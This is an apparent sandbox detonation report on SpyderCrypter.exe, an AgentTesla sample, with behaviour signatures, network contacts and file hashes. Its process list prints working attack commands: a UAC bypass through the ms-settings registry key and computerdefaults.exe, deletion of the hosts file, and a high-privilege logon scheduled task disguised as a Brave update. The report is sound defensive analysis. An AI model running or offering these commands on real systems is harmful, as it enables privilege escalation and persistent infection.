Analysis Overview
SHA256
8babb9a5318d0b2fa43d6c18e91a23a70de547243db91f866e50bb2ff1b7db8b
Threat Level: Known bad
The file SpyderCrypter.exe was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Identifies VirtualBox via ACPI registry values (likely anti-VM)
AgentTesla payload
Checks computer location settings
Executes dropped EXE
Themida packer
Checks BIOS information in registry
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Enumerates physical storage devices
Unsigned PE
Program crash
Modifies registry class
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-15 18:22
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 18:22
Reported
2024-06-15 18:25
Platform
win10v2004-20240611-en
Max time kernel
41s
Max time network
36s
Command Line
Signatures
AgentTesla
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell\open | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\jackpear63605335.vbs" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe
"C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe"
C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe
"C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\jackpear63605335.vbs" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C computerdefaults.exe
C:\Windows\SysWOW64\ComputerDefaults.exe
computerdefaults.exe
C:\Windows\SysWOW64\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\jackpear63605335.vbs
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN BraveUpdateScheduler_QMyk9gHxWJYAojiqe050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\wpnidm\QMyk9gHxWJYAojiqe050MX.exe" /RL HIGHEST /IT
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC ONLOGON /TN BraveUpdateScheduler_QMyk9gHxWJYAojiqe050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\wpnidm\QMyk9gHxWJYAojiqe050MX.exe" /RL HIGHEST /IT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3600 -ip 3600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 1808
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | textpubshiers.top | udp |
| US | 172.67.146.76:443 | textpubshiers.top | tcp |
| US | 8.8.8.8:53 | 76.146.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/2940-0-0x0000000000430000-0x0000000000E3C000-memory.dmp
memory/2940-1-0x0000000077110000-0x0000000077111000-memory.dmp
memory/2940-3-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-7-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-6-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-5-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-8-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-4-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-2-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-11-0x0000000000430000-0x0000000000E3C000-memory.dmp
memory/2940-12-0x0000000000430000-0x0000000000E3C000-memory.dmp
memory/2940-13-0x0000000005E10000-0x00000000063B4000-memory.dmp
memory/2940-14-0x0000000005670000-0x0000000005702000-memory.dmp
memory/2940-15-0x00000000031A0000-0x00000000031AA000-memory.dmp
memory/2940-16-0x0000000005A50000-0x0000000005C64000-memory.dmp
memory/2940-17-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-18-0x0000000008E90000-0x0000000008F40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe
| MD5 | cc132ca7e1cf77db1a3e737260fcf14b |
| SHA1 | f6058656d44e95c23071251b278bc779a88083da |
| SHA256 | 4c62d4e150f91dc3fdd1f29c955763c52f357045b1a2edf98ac272631dfdb210 |
| SHA512 | 52e64fdf7acf08525ddb352b0dd0b6ca3df8d8f13fa09dcd31c270c4e2040f2361c04ba56915cd05539f581df712562537239fbc942131cc725502af6d010fee |
memory/3600-31-0x0000000004C50000-0x0000000004C6A000-memory.dmp
memory/3600-30-0x0000000000E30000-0x0000000000E3A000-memory.dmp
memory/3600-34-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/3600-33-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/3600-32-0x00000000027F0000-0x00000000027FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jackpear63605335.vbs
| MD5 | a34267102c21aff46aecc85598924544 |
| SHA1 | 77268af47c6a4b9c6be7f7487b2c9b233d49d435 |
| SHA256 | eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44 |
| SHA512 | 5d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3 |
memory/3600-37-0x000000000BB50000-0x000000000D093000-memory.dmp
memory/3600-39-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-40-0x0000000000430000-0x0000000000E3C000-memory.dmp
memory/2940-44-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-43-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-42-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-41-0x0000000077110000-0x0000000077111000-memory.dmp
memory/2940-46-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-47-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-45-0x00000000770F0000-0x00000000771E0000-memory.dmp
memory/2940-49-0x00000000770F0000-0x00000000771E0000-memory.dmp